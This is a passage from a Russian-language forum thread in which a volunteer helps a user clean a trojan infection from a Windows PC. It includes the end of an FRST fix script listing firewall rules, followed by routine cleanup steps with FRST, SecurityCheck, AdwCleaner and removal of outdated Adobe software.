FirewallRules: [{737FF17C-2E59-44EF-AE0D-9BB43EC6C7F7}] => (Block) LPort=139
FirewallRules: [{F98C8CFA-84BD-45D4-8B25-3A7C00E6FAD6}] => (Block) LPort=139
FirewallRules: [{288D8FED-5B43-4AA7-8EB6-50023FC46EE7}] => (Block) LPort=445
FirewallRules: [{BAE33902-11E4-40A5-AE46-E537DCDEF1A8}] => (Block) LPort=445
FirewallRules: [{BE13D01B-5366-41EF-98D4-0D0CE6E2BCED}] => (Block) LPort=139
FirewallRules: [{7E589B4E-977E-4176-9A2D-9B4D223D755B}] => (Block) LPort=445
FirewallRules: [{A8266260-EF5D-4435-AEA8-A65F5D43972C}] => (Block) LPort=139
FirewallRules: [{3095AD51-A8F0-4DFA-B9BF-B6DA5C81EB9C}] => (Block) LPort=445
FirewallRules: [{73DB4631-7632-42DC-ADF3-AFFCA451FF30}] => (Block) LPort=139
FirewallRules: [{F3F01CD5-77D8-44B6-BE85-C9FD3501619B}] => (Block) LPort=139
FirewallRules: [{62101226-A22D-45AF-9B96-A957948150B6}] => (Block) LPort=445
FirewallRules: [{DAD5B0D8-A242-4218-8EF7-0543FDCB27F8}] => (Block) LPort=445
FirewallRules: [{2617E527-AA0C-4EC5-82C8-896BE1971541}] => (Block) LPort=139
FirewallRules: [{8EBD1686-6139-414F-A293-28C8ECC5A265}] => (Block) LPort=139
FirewallRules: [{25F5CF92-99FA-4E97-8A10-75ECD8003951}] => (Block) LPort=445
FirewallRules: [{C939DD1F-D195-43F0-86E4-9E94E6C22E5D}] => (Block) LPort=445
FirewallRules: [{0B3B15BE-C492-4432-8B4B-F540ECF5F677}] => (Block) LPort=139
FirewallRules: [{21BBD363-8DA0-4799-A4E0-A7A3971512FA}] => (Block) LPort=139
FirewallRules: [{3BDC4CEB-D90C-4D29-A061-8652704C09AE}] => (Block) LPort=445
FirewallRules: [{766D920F-6D4A-4807-94AE-37E7C57644B9}] => (Block) LPort=445
FirewallRules: [{3FD53E9C-8781-4309-8C61-58BF8202A0D7}] => (Block) LPort=139
FirewallRules: [{40B1FB7E-4BFA-4C97-80B3-FAEAACCCA8B0}] => (Block) LPort=445
FirewallRules: [{F297BCA5-8E0F-40AA-B0FE-0051E993DCEE}] => (Block) LPort=139
FirewallRules: [{DC98D39F-DC11-4EBF-A80E-9827CAD7CE0D}] => (Block) LPort=445
FirewallRules: [{72EBF853-AAA3-4794-AF4B-BE30CE7BCD4B}] => (Block) LPort=139
FirewallRules: [{58046640-E355-4BCA-8EE6-AD0F1CFD7F69}] => (Block) LPort=445
FirewallRules: [{77468943-B1CD-4EAE-8E70-45F48C277643}] => (Block) LPort=139
FirewallRules: [{9B890834-0886-4988-8C31-0CF12CA9A04C}] => (Block) LPort=445
FirewallRules: [{3CACF5A9-8B76-4F6E-A852-79A01BE4FF58}] => (Block) LPort=139
FirewallRules: [{927A2811-9165-44EE-BC8F-CEE9E39491E9}] => (Block) LPort=139
FirewallRules: [{838FA8C4-BA1D-439A-A70D-4681A7681BBC}] => (Block) LPort=445
FirewallRules: [{E5C8340E-22A8-4E3F-971F-5D8A43583A67}] => (Block) LPort=445
FirewallRules: [{2AB0D53A-0752-41E8-9DB8-1EF49DCC5262}] => (Block) LPort=139
FirewallRules: [{767660AA-9579-4C03-B290-EF6194E902E9}] => (Block) LPort=445
FirewallRules: [{42D9C6AF-2DF9-4AF0-8C97-0E13A80B9A92}] => (Block) LPort=139
FirewallRules: [{34665F64-BDE9-434F-9AF3-CAF6827F84BE}] => (Block) LPort=445
FirewallRules: [{D318002E-B3FD-450E-AE46-AF0E33658CD1}] => (Block) LPort=139
FirewallRules: [{5A348483-13BE-4A51-A951-4CBA03EF355B}] => (Block) LPort=139
FirewallRules: [{33186D93-7EB5-4A94-9520-557BB2317F29}] => (Block) LPort=445
FirewallRules: [{39F49720-B9B7-4836-A138-AE71E7A710D1}] => (Block) LPort=445
FirewallRules: [{8B98CF15-17A8-4CC4-A1DB-1DA2FAF59775}] => (Block) LPort=139
FirewallRules: [{4B66FA9E-824F-4B43-A1E5-980A55626826}] => (Block) LPort=139
FirewallRules: [{DABD29F6-6060-4D38-B2E9-983AF300662D}] => (Block) LPort=445
FirewallRules: [{147EE8C7-815C-4E08-9AC9-F7CF909D61A9}] => (Block) LPort=445
FirewallRules: [{39D39C43-CC29-4DD0-A6D3-231805DF8473}] => (Block) LPort=139
FirewallRules: [{9B095D2C-CE0F-4241-9EE1-8E3EFEFB1344}] => (Block) LPort=445
FirewallRules: [{BB301F0E-0A04-4E87-857E-EAA441AB8813}] => (Block) LPort=139
FirewallRules: [{3E9781CD-1BFD-4EE4-A3AA-6606253633CE}] => (Block) LPort=139
FirewallRules: [{248EBCEE-8036-4562-93E4-C0E2285D4018}] => (Block) LPort=445
FirewallRules: [{F733278B-2B31-4998-B715-04710E41845C}] => (Block) LPort=445
FirewallRules: [{60001A5C-A733-47AF-9576-920274A283FF}] => (Block) LPort=139
FirewallRules: [{1F3C74A5-EAF7-42F6-9343-7421FE963107}] => (Block) LPort=139
FirewallRules: [{FA3ED540-F7B6-4EE0-9549-0BEF7424C296}] => (Block) LPort=445
FirewallRules: [{5F6F5F47-C3CF-4BA0-BA4C-170FC1B19A7D}] => (Block) LPort=445
FirewallRules: [{379F0FEB-7B2B-4BD8-AA7D-156BC4A3B8A7}] => (Block) LPort=139
FirewallRules: [{AC4858B1-C16B-419A-B9AF-83264EF57DD9}] => (Block) LPort=139
FirewallRules: [{87E25317-0863-4C93-8AD7-4EAF0CC43AD4}] => (Block) LPort=445
FirewallRules: [{D2B80767-0D00-4E33-8F60-20C2AC2664B7}] => (Block) LPort=445
FirewallRules: [{BFD51E96-C82A-46C2-93B9-C84EB293AA63}] => (Block) LPort=139
FirewallRules: [{F9CE8EF2-19DE-4AB7-BAA3-353B9C38BFBD}] => (Block) LPort=445
FirewallRules: [{ED3AC940-E513-47B0-B238-772350A6153C}] => (Block) LPort=139
FirewallRules: [{59A66F6F-463C-4E4D-9E6F-AC27D4AF945A}] => (Block) LPort=445
FirewallRules: [{D77E1EA9-5B72-49B5-89BD-8B3C584A5BE7}] => (Block) LPort=139
FirewallRules: [{04E48054-4392-4283-8050-0829AA5DF5AB}] => (Block) LPort=445
FirewallRules: [{86C88A73-6A64-4242-9160-3260C8C9A818}] => (Block) LPort=139
FirewallRules: [{9C2315BA-CB81-4F04-9B28-75572B63990A}] => (Block) LPort=445
FirewallRules: [{FE21507F-A8A8-4EE4-B331-364E1DEBBC66}] => (Block) LPort=139
FirewallRules: [{84B5628F-D6DC-47F4-9BD2-45AEF42589A7}] => (Block) LPort=445
FirewallRules: [{B7EEAF30-9F39-41DB-B59D-6F9579CF3ABC}] => (Block) LPort=139
FirewallRules: [{CB336C4A-F67D-43C0-BA65-D70078FD7D9D}] => (Block) LPort=445
FirewallRules: [{0F950DB6-B005-4EE3-A311-52BFC64BEBFD}] => (Block) LPort=139
FirewallRules: [{424DCF0B-B573-4836-9DFA-7886B1D3ED20}] => (Block) LPort=139
FirewallRules: [{8C39C34A-D57E-4B1C-84A2-032248CE41FA}] => (Block) LPort=445
FirewallRules: [{0B92F49B-D9D7-4608-862C-7A5693F56FC1}] => (Block) LPort=445
FirewallRules: [{47F2F948-DB2A-49E7-B057-9E64E65B6B83}] => (Block) LPort=139
FirewallRules: [{E50BC868-D752-43D0-8E82-FE8B66E8711A}] => (Block) LPort=139
FirewallRules: [{27898A66-42D0-41F7-AC6B-A810D910D334}] => (Block) LPort=445
FirewallRules: [{22C1D235-EAA6-482D-98A7-8DA55A67A4E1}] => (Block) LPort=445
FirewallRules: [{162C2AF6-F852-4839-B7F4-B2A0D4C0A5D8}] => (Block) LPort=139
FirewallRules: [{0AD11CF1-22ED-4EA1-95F5-63800F54CB77}] => (Block) LPort=445
FirewallRules: [{0400429A-8B67-4EBC-9F64-45EFD65D43F8}] => (Block) LPort=139
FirewallRules: [{8E2B6EC8-7BCC-483B-A6CD-5C5A822ADADA}] => (Block) LPort=445
FirewallRules: [{443F0DDD-8B73-4325-9E1E-866A3BB95241}] => (Block) LPort=139
FirewallRules: [{9DD6027A-8D69-44CA-86F9-E77C1F63483D}] => (Block) LPort=445
FirewallRules: [{86A2A479-6E08-427D-8995-A8091B863607}] => (Block) LPort=139
FirewallRules: [{2F599213-6FFD-4A16-9F2B-25942C893EEC}] => (Block) LPort=445
FirewallRules: [{D5D622E2-0070-4DE1-9617-7AF6F18AF50C}] => (Block) LPort=139
FirewallRules: [{1C6AF744-9B5C-4E23-B1AC-C14D8EEF53C7}] => (Block) LPort=445
FirewallRules: [{1EEADA03-8ACC-4D23-8156-E81E8716F09B}] => (Block) LPort=139
FirewallRules: [{9612A438-87CF-494D-981F-0CC0811633EA}] => (Block) LPort=445
FirewallRules: [{C46C6A8A-7108-4C93-85C3-6DA4BE77D248}] => (Block) LPort=139
FirewallRules: [{138EF67F-9253-46EC-B2C8-10EE6058AC76}] => (Block) LPort=445
FirewallRules: [{5B4C505A-B041-4A80-8178-1A8CDA536A85}] => (Block) LPort=139
FirewallRules: [{68BCDF59-41A3-41E7-A27C-A9FCBAF66A8F}] => (Block) LPort=445
FirewallRules: [{D6443418-B89E-44CE-8983-EB41210E4C3A}] => (Block) LPort=139
FirewallRules: [{2F6C4540-D1E1-42A7-B3BA-7ACDA09C03ED}] => (Block) LPort=445
FirewallRules: [{EC63B4D1-BC64-4183-BA04-334708881253}] => (Block) LPort=139
FirewallRules: [{46EFC63D-4F0B-4687-A7F3-932165607F8C}] => (Block) LPort=445
FirewallRules: [{9E20D785-58C5-4CF7-86E1-FE4C1278F5B1}] => (Block) LPort=139
FirewallRules: [{D5E1A64B-60C4-40D7-AE41-0F6F2F770DF6}] => (Block) LPort=445
FirewallRules: [{82153F17-D7AF-440C-8AEB-E40FF67B0A3D}] => (Allow) C:\Users\user\AppData\Roaming\Zoom\bin\Zoom.exe => Нет файла
FirewallRules: [{5A914F6A-C45C-45D7-8A87-407A249F0FC2}] => (Allow) C:\Users\user\AppData\Roaming\Zoom\bin\airhost.exe => Нет файла
FirewallRules: [{EC1422BD-ADFA-46B6-BADA-DB2728472518}] => (Allow) C:\Program Files (x86)\360\Total Security\softmgr\360InstantSetup.exe (QIHU 360 SOFTWARE CO. LIMITED -> Qihoo 360 Technology Co. Ltd.)
FirewallRules: [{C791772A-8254-441B-8C95-E9D0F61B141F}] => (Allow) C:\Program Files (x86)\360\Total Security\softmgr\360InstantSetup.exe (QIHU 360 SOFTWARE CO. LIMITED -> Qihoo 360 Technology Co. Ltd.)
FirewallRules: [{1F4C8B74-812E-4C2D-A9A8-CAC893E4BD98}] => (Block) LPort=445
FirewallRules: [{8AB06017-C353-4CDE-A0D7-A8A132834847}] => (Block) LPort=139
S1 MpKslaeeb4da8; \??\C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{7C4F1002-0B34-47A0-9679-DD65B6FA085C}\MpKslaeeb4da8.sys [X]
Virustotal: C:\Users\user\Desktop\Помощник\Project2 (1).exe
ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
Reboot:
End::
    Запустите FRST.EXE/FRST64.EXE, нажмите один раз Исправить и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
    Компьютер будет перезагружен автоматически.

    Удалите остатки Avast! утилитой aswclear.exe в безопасном режиме.

    Загрузите, распакуйте на Рабочий стол и запустите SecurityCheck by glax24 & Severnyj.
    Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запуск от имени администратора (если Вы используете Windows Vista/7/8/10).
    Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
    Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
    Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt.

    Приложите этот файл к своему следующему сообщению.
    WBR,
    Vadim
    Ответить с цитированием Ответить с цитированием
  8. 26.08.2021, 00:28 #6
    lexperience
    lexperience вне форума
    Junior Member Репутация
    Регистрация
    24.08.2021
    Сообщений
    6
    Вес репутации
    10
    Fixlog.txt
    SecurityCheck.txt
    Ответить с цитированием Ответить с цитированием
  9. 26.08.2021, 07:50 #7
    Vvvyg
    Vvvyg вне форума
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,502
    Вес репутации
    1058
    Adobe Flash Player 24 NPAPI v.24.0.0.221 Данная программа больше не поддерживается разработчиком. Рекомендуется деинсталлировать ее.
    Adobe Reader 9.4.0 - Russian v.9.4.0 Данная программа больше не поддерживается разработчиком. Рекомендуется деинсталлировать ее, скачать и установить Adobe Acrobat Reader DC.
    Выполните эти рекомендации.

    Проблема решена?

    Сделайте лог Malwarebytes AdwCleaner.
    WBR,
    Vadim
    Ответить с цитированием Ответить с цитированием
  10. 26.08.2021, 20:25 #8
    lexperience
    lexperience вне форума
    Junior Member Репутация
    Регистрация
    24.08.2021
    Сообщений
    6
    Вес репутации
    10
    Какие рекомендации? У меня вот что отображается 12312312123.png
    Ответить с цитированием Ответить с цитированием
  11. 26.08.2021, 21:43 #9
    Vvvyg
    Vvvyg вне форума
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,502
    Вес репутации
    1058
    Так это и есть рекомендации. Что-то не ясно?
    WBR,
    Vadim
    Ответить с цитированием Ответить с цитированием
  12. 26.08.2021, 22:16 #10
    lexperience
    lexperience вне форума
    Junior Member Репутация
    Регистрация
    24.08.2021
    Сообщений
    6
    Вес репутации
    10
    Все понял, я думал просто что должно было что-то отобразится на странице, но не может так как у меня нет флеш-плеера)

    То есть мне просто удалить флеш поставить риадер и сделать лог и все?
    Ответить с цитированием Ответить с цитированием
  13. 27.08.2021, 07:28 #11
    Vvvyg
    Vvvyg вне форума
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,502
    Вес репутации
    1058
    Да. И Adobe Reader 9.4.0 предварительно удалите.

    Троян не появлялся больше?
    WBR,
    Vadim
    Ответить с цитированием Ответить с цитированием
« Предыдущая тема | Следующая тема »

Похожие темы

  1. Карантин 31FC40E7797BAD3249916C02351A4E91 [Trojan.VBS.Miner.y, Trojan.BAT.Miner.fs, Trojan.VBS.Miner.x ]
    От CyberHelper в разделе VirusDetector - Бесплатный онлайн-сервис проверки компьютера
    Ответов: 2
    Последнее сообщение: 29.07.2018, 18:24
  2. W32.Downadup.B и W32.IRCbot
    От Суббота в разделе Помогите!
    Ответов: 22
    Последнее сообщение: 24.02.2010, 10:18
  3. W32.Fakerecy.W32.Ircbrute.Trojan Horse.
    От Tussen в разделе Помогите!
    Ответов: 3
    Последнее сообщение: 29.07.2009, 23:14
  4. w32.sillyFDC, w32.IRCbot, Downloader
    От dwolfb в разделе Помогите!
    Ответов: 3
    Последнее сообщение: 17.04.2009, 13:39
  5. Заражение вирусом w32.stration.DB@mm и w32.stration.cX@mm
    От Станислав в разделе Помогите!
    Ответов: 16
    Последнее сообщение: 22.02.2009, 01:37

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  

Правила форума

Page generated in 0.01319 seconds with 18 queries